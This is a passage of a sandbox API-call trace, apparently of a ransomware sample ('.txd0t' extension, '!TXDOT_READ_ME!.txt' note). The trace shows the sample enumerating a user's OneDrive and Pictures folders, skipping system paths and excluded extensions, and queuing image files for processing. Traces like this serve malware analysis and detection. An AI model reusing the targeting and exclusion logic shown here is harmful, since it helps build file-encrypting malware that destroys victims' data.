nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0075.457] StrCmpW (psz1="ntuser.ini", psz2=".") returned 1 [0075.457] StrCmpW (psz1="ntuser.ini", psz2="..") returned 1 [0075.457] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0075.457] StrCmpW (psz1="OneDrive", psz2=".") returned 1 [0075.457] StrCmpW (psz1="OneDrive", psz2="..") returned 1 [0075.457] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0075.457] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0075.457] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="OneDrive", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0075.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\system32\\") returned 0x0 [0075.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\syswow64\\") returned 0x0 [0075.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\system\\") returned 0x0 [0075.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\winsxs\\") returned 0x0 [0075.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\roaming\\") returned 0x0 [0075.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\local\\") returned 0x0 [0075.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\locallow\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\all users\\microsoft\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\inetpub\\logs\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\boot\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\perflogs\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\programdata\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\drivers\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\wsus\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\efstmpwp\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\$recycle.bin\\") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="crypt_detect") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="cryptolocker") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="ransomware") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\WINDOWS") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\Program Files (x86)") returned 0x0 [0075.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\Program Files") returned 0x0 [0075.458] GetProcessHeap () returned 0xe30000 [0075.458] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed0058 [0075.458] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\OneDrive", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0075.458] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\OneDrive", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\OneDrive\\*") returned="C:\\Users\\FD1HVy\\OneDrive\\*" [0075.458] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2530 [0075.458] StrCmpW (psz1=".", psz2=".") returned 0 [0075.458] FindNextFileW (in: hFindFile=0xec2530, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.458] StrCmpW (psz1="..", psz2=".") returned 1 [0075.458] StrCmpW (psz1="..", psz2="..") returned 0 [0075.458] FindNextFileW (in: hFindFile=0xec2530, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.458] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0075.459] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0075.459] FindNextFileW (in: hFindFile=0xec2530, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0075.459] FindClose (in: hFindFile=0xec2530 | out: hFindFile=0xec2530) returned 1 [0075.459] GetProcessHeap () returned 0xe30000 [0075.459] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0075.459] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5f429e2, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5f429e2, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0075.459] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0075.459] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0075.459] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0075.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0075.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Pictures", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="crypt_detect") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="cryptolocker") returned 0x0 [0075.459] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="ransomware") returned 0x0 [0075.460] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0075.460] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0075.460] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0075.460] GetProcessHeap () returned 0xe30000 [0075.460] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed0058 [0075.460] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\*") returned="C:\\Users\\FD1HVy\\Pictures\\*" [0075.460] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5f429e2, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5f429e2, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec27f0 [0075.460] StrCmpW (psz1=".", psz2=".") returned 0 [0075.460] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5f429e2, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5f429e2, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.460] StrCmpW (psz1="..", psz2=".") returned 1 [0075.460] StrCmpW (psz1="..", psz2="..") returned 0 [0075.460] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd323bc90, ftCreationTime.dwHighDateTime=0x1d5eb85, ftLastAccessTime.dwLowDateTime=0xea7abc60, ftLastAccessTime.dwHighDateTime=0x1d5edea, ftLastWriteTime.dwLowDateTime=0xea7abc60, ftLastWriteTime.dwHighDateTime=0x1d5edea, nFileSizeHigh=0x0, nFileSizeLow=0x8a8a, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="6to-Do2T3Y6Ag.jpg", cAlternateFileName="6TO-DO~1.JPG")) returned 1 [0075.460] StrCmpW (psz1="6to-Do2T3Y6Ag.jpg", psz2=".") returned 1 [0075.460] StrCmpW (psz1="6to-Do2T3Y6Ag.jpg", psz2="..") returned 1 [0075.460] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="6to-Do2T3Y6Ag.jpg", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg" [0075.460] PathFindExtensionW (pszPath="6to-Do2T3Y6Ag.jpg") returned=".jpg" [0075.460] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0075.460] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="bootsect.bak") returned -1 [0075.460] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="iconcache.db") returned -1 [0075.460] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="thumbs.db") returned -1 [0075.460] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2=" ransomware ") returned 1 [0075.460] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2=" ransom ") returned 1 [0075.460] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="debug.txt") returned -1 [0075.460] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="boot.ini") returned -1 [0075.460] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="desktop.ini") returned -1 [0075.461] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="autorun.inf") returned -1 [0075.461] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="ntuser.dat") returned -1 [0075.461] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="ntldr") returned -1 [0075.461] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="ntdetect.com") returned -1 [0075.461] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="bootfont.bin") returned -1 [0075.461] StrCmpIW (psz1="6to-Do2T3Y6Ag.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.461] PathFindExtensionW (pszPath="6to-Do2T3Y6Ag.jpg") returned=".jpg" [0075.461] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0075.461] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0075.461] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0075.461] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0075.470] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.471] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg" [0075.471] SetEvent (hEvent=0x418) returned 1 [0075.471] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2704850, ftCreationTime.dwHighDateTime=0x1d5e90c, ftLastAccessTime.dwLowDateTime=0x87a14c10, ftLastAccessTime.dwHighDateTime=0x1d5efbd, ftLastWriteTime.dwLowDateTime=0x87a14c10, ftLastWriteTime.dwHighDateTime=0x1d5efbd, nFileSizeHigh=0x0, nFileSizeLow=0x11c6a, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="7ln6G64dp6.gif", cAlternateFileName="7LN6G6~1.GIF")) returned 1 [0075.471] StrCmpW (psz1="7ln6G64dp6.gif", psz2=".") returned 1 [0075.471] StrCmpW (psz1="7ln6G64dp6.gif", psz2="..") returned 1 [0075.471] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.471] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.471] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="7ln6G64dp6.gif", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif") returned="C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif" [0075.471] PathFindExtensionW (pszPath="7ln6G64dp6.gif") returned=".gif" [0075.471] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="bootsect.bak") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="iconcache.db") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="thumbs.db") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2=" ransomware ") returned 1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2=" ransom ") returned 1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="debug.txt") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="boot.ini") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="desktop.ini") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="autorun.inf") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="ntuser.dat") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="ntldr") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="ntdetect.com") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="bootfont.bin") returned -1 [0075.471] StrCmpIW (psz1="7ln6G64dp6.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.472] PathFindExtensionW (pszPath="7ln6G64dp6.gif") returned=".gif" [0075.472] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0075.472] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0075.472] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0075.472] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.793] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.793] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif" [0075.793] SetEvent (hEvent=0x3fc) returned 1 [0075.793] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6ba20, ftCreationTime.dwHighDateTime=0x1d5ea6d, ftLastAccessTime.dwLowDateTime=0xf55c7820, ftLastAccessTime.dwHighDateTime=0x1d5e3c8, ftLastWriteTime.dwLowDateTime=0xf55c7820, ftLastWriteTime.dwHighDateTime=0x1d5e3c8, nFileSizeHigh=0x0, nFileSizeLow=0x4a6a, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="ai_VKHzC7Sqq7BSY5RS0.jpg", cAlternateFileName="AI_VKH~1.JPG")) returned 1 [0075.793] StrCmpW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2=".") returned 1 [0075.793] StrCmpW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="..") returned 1 [0075.793] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.793] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.793] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="ai_VKHzC7Sqq7BSY5RS0.jpg", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg" [0075.793] PathFindExtensionW (pszPath="ai_VKHzC7Sqq7BSY5RS0.jpg") returned=".jpg" [0075.793] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="bootsect.bak") returned -1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="iconcache.db") returned -1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="thumbs.db") returned -1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2=" ransomware ") returned 1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2=" ransom ") returned 1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="debug.txt") returned -1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="boot.ini") returned -1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="desktop.ini") returned -1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="autorun.inf") returned -1 [0075.793] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="ntuser.dat") returned -1 [0075.794] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="ntldr") returned -1 [0075.794] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="ntdetect.com") returned -1 [0075.794] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="bootfont.bin") returned -1 [0075.794] StrCmpIW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.794] PathFindExtensionW (pszPath="ai_VKHzC7Sqq7BSY5RS0.jpg") returned=".jpg" [0075.794] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0075.794] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0075.794] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0075.794] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.827] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.827] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg" [0075.827] SetEvent (hEvent=0x3fc) returned 1 [0075.828] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0075.828] StrCmpW (psz1="Camera Roll", psz2=".") returned 1 [0075.828] StrCmpW (psz1="Camera Roll", psz2="..") returned 1 [0075.828] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") 